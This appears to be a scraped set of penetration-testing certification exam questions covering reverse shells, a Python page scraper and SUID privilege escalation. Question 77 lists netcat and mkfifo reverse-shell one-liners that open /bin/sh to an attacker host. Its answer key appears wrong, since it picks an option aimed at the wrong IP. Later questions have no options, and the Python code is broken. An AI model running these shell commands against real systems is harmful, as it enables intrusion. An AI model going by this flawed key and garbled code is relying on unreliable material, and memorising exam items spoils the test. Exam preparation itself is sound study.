Question 77 during a web application assessment a


Question: 77
During a web application assessment, a penetration tester discovers that arbitrary commands can be executed on the server. Wanting to take this attack one step further, the penetration tester begins to explore ways to gain a reverse shell back to the attacking machine at 192.168.1.5. Which of the following are possible ways to do so? (Select TWO)

A. nc 192.168.1.5 44444
B. nc -nlvp 4444 -e /bin/sh
C. rm /tmp/f; mkfifo /tmp/f; cat /tmp/f| /bin/sh –I 2>&1|nc 192.168.1.5 44444>/tmp /f
D. nc -e /bin/sh 192.168.1.5 4444
E. rm /tmp/f; mkfifo /tmp/f; cat /tmp/f| /bin/sh –I 2>&1|nc 192.168.1.5 444444>/tmp /f
F. rm /tmp/f; mkfifo /tmp/f; cat /tmp/f| /bin/sh –I 2>&1|nc 192.168.5.1 44444>/tmp /f

Answer: DF

Question: 78
A penetration tester wants to launch a graphic console window from a remotely compromised host with IP 10.0.0.20 and display the terminal on the local computer with IP 192.168.1.10. Which of the following would accomplish this task?
Question: 79
A penetration tester is performing a black box assessment on a web-based banking application. The tester was only provided with a URL to the login page. Given the below code and output:

    import requests
    from BeautifulSoup import BeautifulSoup
    request = requests.get (" ")
    respHeaders, respBody = request[0]. Request[1]
    if respHeader.statuscode == 200:
        soup = BeautifulSoup (respBody)
        soup = soup.FindAll ("div", ("type" : "hidden"))
        print respHeader. StatusCode, StatusMessage
    else:
        print respHeader. StatusCode, StatusMessage

Output: 200 OK

Which of the following is the tester intending to do?
Question: 80
After gaining initial low-privilege access to a Linux system, a penetration tester identifies an interesting binary in a user's folder titled "changepass":

    -sr-xr-x 1 root root 6443 Oct 18 2017 /home/user/changepass

Using "strings" to print ASCII printable characters from changepass, the tester notes the following:

    $ strings changepass
    Exit
    setuid
    strmp
    GLINC _2.0
    ENV_PATH
    %s/changepw
    malloc
    strlen

Given this information, which of the following is the MOST likely path of exploitation to achieve root privileges on the machines?
